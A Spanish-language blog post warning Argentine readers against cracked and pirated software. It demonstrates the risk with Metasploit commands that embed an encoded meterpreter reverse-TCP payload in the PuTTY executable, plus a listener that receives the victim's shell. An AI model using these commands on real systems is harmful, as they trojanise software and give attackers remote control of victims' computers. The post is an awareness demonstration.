Posted by & filed under computación, internet, Seguridad Informática.

Frases típica de una madre son “Abrigate que hace frío”, “Mirá a ambos lados antes de cruzar la calle” y también está la típica “No aceptes nada de extraños”. Aunque nos resulte rara la analogía el mismo consejo aplica a los que es Software.

No es ajeno a nadie el hecho de que acá en Argentina abunda el software pirata, usamos Windows trucho, lo crackeamos, usamos antivirus crackeados y juegos crackeados. Sí, el software original (privativo) suele ser caro y poco accesible a la economía de un usuario tipo. Pero acá radica un peligro, no tenemos ninguna, absolutamente NINGUNA certeza del origen de ese software. Nada ni nadie nos garantiza que los cracks, parches, programas que utilizamos no tengan embebidos código malicioso. Por eso mismo instalar un antivirus crackeado es una paradoja, instalamos un sistema desconfiable para darnos seguridad.

Hagamos una demostración

Veamos que tan fácil es con un ejecutable adulterado (por nosotros), podemos acceder al sistema de quien lo ejecute. Para ello utilizaré la suite metasploit y modificaré el ejecutable del programa putty.

1º Introduzcamos un exploit al archivo ejecutable

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.83 LPORT=1234 R | msfencode -t exe -x /mnt/putty.exe -k -o /mnt/prueba.exe -e x86/shikata_ga_nai -c 3

Veamos que es lo que hace esto, para ello divido esto en dos

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.83 LPORT=1234 R

Acá lo que se hace es crear un payload de meterpreter que llame a la dirección y puerto que dimos

| msfencode -t exe -x /mnt/putty.exe -k -o /mnt/prueba.exe

Mediante un pipe lo resultante del msfpayload lo proceso con el msfencode que toma el ejecutable original, embebe el payload y luego lo encripta 3 veces.

Una vez creado el archivo infectado, debemos ponernos en modo escucha para recibir la conexión desde la víctima, para ello:

msfcli exploit/multi/handler LHOST=192.168.0.83 LPORT=1234 E

Ahora es cuestión de esperar que la víctima ejecute el programa, veamos una imagen de lo que pasa cuando esto sucede:

971735_10151728366850782_853227910_n

Vemos como el programa se ejecuta sin problemas ni errores o advertencias, y en la pantalla de la izquierda vemos que nos avisa de una sesión iniciada y nos devuelve un prompt de meterpreter.

Desde acá está todo a un sólo paso, migrar de proceso, obtener privilegios de administrador, y el resto lo que la imaginación nos permita.

Acá también un video:

One Response to “No acepte software de extraños”

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *